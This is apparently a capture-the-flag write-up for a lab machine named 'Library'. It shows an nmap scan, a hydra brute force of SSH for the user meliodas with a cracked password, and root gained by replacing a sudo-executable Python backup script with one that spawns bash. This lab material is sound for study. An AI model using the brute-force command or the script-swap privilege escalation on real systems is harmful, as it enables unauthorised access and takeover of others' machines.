# Library
## Tasks
* user.txt
* root.txt
## Vulnerabilities
* Weak password
* Able to remove write-protected file.


### NMAP SCAN
```nmap
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:2f:c3:47:67:06:32:04:ef:92:91:8e:05:87:d5:dc (RSA)
|   256 68:92:13:ec:94:79:dc:bb:77:02:da:99:bf:b6:9d:b0 (ECDSA)
|_  256 43:e8:24:fc:d8:b8:d3:aa:c2:48:08:97:51:dc:5b:7d (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to  Blog - Library Machine
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## Foothold
After hours of enumerating, I was devastated. Nothing was showing up on Gobuster,OWasp ZAP, NMAP. I decided to look back at the robots.txt and I noticed this
```txt
User-Agent : rockyou
```
This looks odd, there isn't any User-Agents with rockyou. Maybe this is hinting towards brute-forcing SSH? We do have the user meliodas.
Let's give it a go, I'm referring to a cheat sheet for the commands.
```bash
hydra -l meliodas -P /opt/wordlists/rockyou.txt -u 10.10.148.31 ssh

```
2 minutes later,
```bash
[22][ssh] host: 10.10.148.31   login: meliodas   password: iloveyou1
```
Success!
```bash
Last login: Sat Aug 24 14:51:01 2019 from 192.168.15.118
meliodas@ubuntu:~$ ls
bak.py  user.txt
```
Now we have our user.txt
## Privesc
Let's check out that bak.py file.
```py
#!/usr/bin/env python
import os
import zipfile

def zipdir(path, ziph):
    for root, dirs, files in os.walk(path):
        for file in files:
            ziph.write(os.path.join(root, file))

if __name__ == '__main__':
    zipf = zipfile.ZipFile('/var/backups/website.zip', 'w', zipfile.ZIP_DEFLATED)
    zipdir('/var/www/html', zipf)
    zipf.close()
```
Sadly we can't edit it, but we can replace it. Let's remove it and add our own bak.py
```py
import os
os.system("/bin/bash")
```
Simple script. It will spawn a shell and maintain that privilege since we're running it as sudo. Now let's try it.
```bash
meliodas@ubuntu:~$ sudo python3 /home/meliodas/bak.py 
root@ubuntu:~# whoami
root
```
And done! We rooted this back easily.